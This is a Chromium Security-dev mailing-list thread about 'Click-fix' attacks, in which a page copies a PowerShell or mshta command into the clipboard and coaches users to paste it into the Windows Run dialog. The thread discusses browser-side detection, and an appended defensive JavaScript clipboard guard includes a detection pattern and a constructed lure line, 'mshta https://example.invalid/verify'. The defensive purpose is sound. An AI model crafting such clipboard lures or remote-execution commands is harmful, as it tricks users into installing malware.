
Click-fix: detecting and preventing malicious use of user clipboard


Aaron Walton

Jan 9, 2025, 3:47:35 PM
to Security-dev
Hello Security-dev,
I reviewed open discussions and didn’t see reference to the following topic, but if it is being discussed somewhere I did not see, please let me know.

I work for a Managed Security Services Provider (MSSP), and we are seeing heavy abuse of a tactic where a web page instructs the user to open the Windows Run dialog box with the hotkey Win+R, and has them paste in a malicious command with Ctrl+V that the web browser has preemptively copied into their clipboard.

Usually the web page does this under the guise of a problem with the browser or the guise of a CAPTCHA. This attack technique has become extremely popular, so it is in my interest to help identify solutions to help mitigate the effectiveness of the tactic. The malicious command copied to the clipboard generally retrieves and executes a remote script that will execute using PowerShell or mshta. This tactic is talked about as "Click-fix" since it originally had the user click a button to copy the script to fix the problem.

This is an example of the tactic, where, at the time of the user's visit, the browser has modified the user's clipboard, requiring no action from them to copy it:
Screenshot 2025-01-09 at 7.03.50 AM.png

One possible solution is notifying the user when their clipboard is modified by a webpage. This type of notification is already done by some browser extensions in similar situations, such as Malwarebytes' Browser Guard. The following is an example of a message a user could receive:
image (8).png

This is one possible solution, but consideration of multiple possible solutions is recommended.

To understand how the tactic works mechanically, I recommend this GitHub repo from JohnHammond: https://github.com/JohnHammond/recaptcha-phish

Please let me know if you have any questions, but it has seemed important to raise this to your awareness due to how much we are seeing this technique used.
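
One way the clipboard-change notice proposed in the post above could be implemented, as an added example that is not part of the original thread and not the code of any browser or extension. The names `assessClipboardText` and `guardClipboard`, the heuristic itself and the sample strings are assumptions made for illustration.

```javascript
// Added example, not from the thread. The script hosts (PowerShell, mshta)
// are the ones named in the post; everything else here is an assumption.
const SCRIPT_HOST = /\b(?:powershell|pwsh|mshta)(?:\.exe)?\b/i;
const REMOTE_URL = /\bhttps?:\/\/[^\s"'<>]+/i;

// Classify one clipboard write. `userGesture` is whether the user just
// interacted with the page (a click on a "copy" button, for example).
function assessClipboardText(text, userGesture) {
  const reasons = [];
  if (SCRIPT_HOST.test(text)) reasons.push("runs a Windows script host");
  if (REMOTE_URL.test(text)) reasons.push("points at a remote URL");
  // Warn only on a command that fetches something remote; plain text and
  // plain links stay quiet so the notice keeps its meaning.
  const suspicious = reasons.length === 2;
  if (suspicious && !userGesture) reasons.push("copied without user action");
  return { suspicious, reasons };
}

// Wrap a clipboard-like object (same writeText shape as navigator.clipboard)
// so each write is assessed first. Suspicious writes are dropped and reported.
function guardClipboard(clipboard, notify, hasUserGesture = () => false) {
  const original = clipboard.writeText.bind(clipboard);
  clipboard.writeText = async (text) => {
    const verdict = assessClipboardText(String(text), hasUserGesture());
    if (verdict.suspicious) {
      notify("A page tried to copy a command to your clipboard: " +
             verdict.reasons.join("; "));
      return false; // nothing reaches the clipboard
    }
    await original(text);
    return true;
  };
  return clipboard;
}

// Constructed demo: an in-memory stand-in for navigator.clipboard.
const fake = { value: "", async writeText(t) { this.value = t; } };
const notices = [];
guardClipboard(fake, (msg) => notices.push(msg));
fake.writeText("mshta https://example.invalid/verify");   // constructed lure text
fake.writeText("Agenda: https://example.invalid/agenda"); // benign link
```

This wrapper only sees writes made through `writeText`; a page can also copy through `document.execCommand('copy')`, which would need a separate `copy` event listener.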

Nathan Parker

Jan 17, 2025, 2:55:57 PM
to Aaron Walton, Security-dev
Hi Aaron --
Thanks for sharing. This is an attack method we're aware of and we've also seen it increase in volume. We're looking at ways to better detect and flag pages that use this technique so that users aren't exposed to this social engineering in the first place.

 -- Nathan

Aaron Walton

Jan 20, 2025, 2:26:30 AM
to Security-dev, npa...@chromium.org, Security-dev, Aaron Walton
Awesome. Glad to hear you guys are actively looking for ways to detect and flag those pages. Is there anything about this tactic that we can provide to help determine ways to detect and flag them? Would it help to have more examples of active pages or anything of that nature? Happy to help out however possible.

Its PaPPy

May 14, 2025, 5:31:49 PM
to Security-dev, Aaron Walton, npa...@chromium.org, Security-dev
I am seeing this more and more. It would be great if Chrome built in some detection for this. The method used by Malwarebytes does seem to work pretty well, but getting everyone to install a plugin is rather challenging.

malwarebytes.png

ابو جنا

May 18, 2025, 11:04:46 AM
to Its PaPPy, Security-dev, Aaron Walton, npa...@chromium.org, ابو جنا‎